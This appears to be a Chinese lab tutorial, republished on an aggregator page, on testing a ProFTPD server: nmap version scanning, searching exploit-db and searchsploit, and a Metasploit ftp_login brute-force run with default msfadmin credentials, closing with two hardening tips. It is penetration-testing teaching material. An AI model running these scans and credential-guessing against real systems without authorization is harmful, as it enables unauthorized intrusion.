当前位置:网站首页>6-20漏洞利用-proftpd测试
6-20漏洞利用-proftpd测试
2022-07-28 17:10:00 【山兔1】

proftpd介绍
ProFTPD:一个Unix平台上或是类Unix平台上(如Linux,FreeBSD等)的FTP服务器程序
http://www.proftpd.org/

可以下载对应的版本,然后进行环境搭建
探测目标proftpd
使用nmap -sV -p 2121 IP地址 探测目标proftpd版本信息

在这里,我们可以清晰的探测到版本信息
我们先探测目标开放的端口
nmap 192.168.1.105
下面,我们就使用具体的版本信息,来探测目标信息
nmap -sV -p 2121 192.168.1.105
以上,我们就完成了对应的版本探测
exploit-db搜索目标漏洞
在https://www.exploit-db.com/输入对应软件及版本搜索是否有漏洞

如果没有搜索出来,说明这个版本没有具体的漏洞
searchsploit proftpd 1.3

可以看到这个是1.3的漏洞
searchsploit proftpd 1.3.1

我们看到1.3.1也是没有搜索出对应的漏洞,当然,我们也可以拿proftpd版本的漏洞,在这上面尝试
msf暴力破解
使用metasploit下的 auxiliary/scanner/ftp/ftp_login 进行目标探测

可以看到有很多的漏洞,我们可以根据实际情况,下载版本进行测试,我们从官网下载,即可安装搭建,可以看到有很多的rce漏洞
msfconsole
use auxiliary/scanner/ftp/ftp_login
show options

set rhosts 192.168.1.105
set rport 2121

我们在设置的时候,可以设置21号端口,前提是,这个端口,运行ftp服务,rhosts是一定要设置具体的IP地址,或者CIDR,就会对当前下的IP地址,进行猜解
set username msfadmin

实际情况下,我们也可以设置对应的用户文件
set password msfadmin
run

1、将软件升级到最新的版本,不存在漏洞的版本
2、加强监控,对当前的系统加强监控,关闭不必要的端口
边栏推荐
- LeetCode_ 96_ Different binary search trees
- Leetcode binary tree class
- PyG搭建异质图注意力网络HAN实现DBLP节点预测
- GC garbage collector details
- CTR click through rate prediction practice project of advertising recommendation!
- Swiftui component how to implement textfield of hidden part of phone number mask (tutorial includes source code)
- Win11电脑摄像头打开看不见,显示黑屏如何解决?
- Configuration tutorial: how does the organizational structure of the new version of easycvr (v2.5.0) cascade to the superior platform?
- 湖上建仓全解析:如何打造湖仓一体数据平台 | DEEPNOVA技术荟系列公开课第四期
- JVM tuning
猜你喜欢

How to adjust the brightness of win11? Four methods of adjusting screen brightness in win11

LeetCode_ 63_ Different paths II

Self cultivation of Electronic Engineers - when a project is developed

2022年中国企业服务产业市场行情

LeetCode_ 96_ Different binary search trees

AI 改变千行万业,开发者如何投身 AI 语音新“声”态

Four years later, Debian finally recaptured the "debian.community" domain name!

Introduction and advanced MySQL (7)

Redis advantages and data structure related knowledge

jvm四种引用类型
随机推荐
【数据分析】基于MATLAB实现SVDD决策边界可视化
How to choose between software testing and software development?
我的创作纪念日 -- 2022年7月25日
使用自开发的代理服务器解决 SAP UI5 FileUploader 上传文件时遇到的跨域访问错误试读版
112. 使用自开发的代理服务器解决 SAP UI5 FileUploader 上传文件时遇到的跨域访问错误
How big is it suitable for learning software testing?
Win11电脑摄像头打开看不见,显示黑屏如何解决?
GC garbage collector details
SwiftUI Swift 之正向地理编码与反向地理编码(教程含源码)
Redis cache avalanche, penetration, breakdown, bloom filter, detailed explanation of distributed lock
QT user defined control user guide (flying Qingyun)
注意力机制及代码实现
What is one hot code? Why use it and when?
Kotlin:Sealed class密封类详解
“讳疾忌医”的开源走不远
PyG搭建异质图注意力网络HAN实现DBLP节点预测
历史上的今天:微软收购 QDOS;模型检测先驱出生;第一张激光照排的中文报纸...
What kind of knowledge payment system functions are more conducive to the development of the platform and lecturers?
Use the self-developed proxy server to solve the cross domain access errors encountered when uploading files by SAP ui5 fileuploader trial version
Pytorch GPU yolov5 reports an error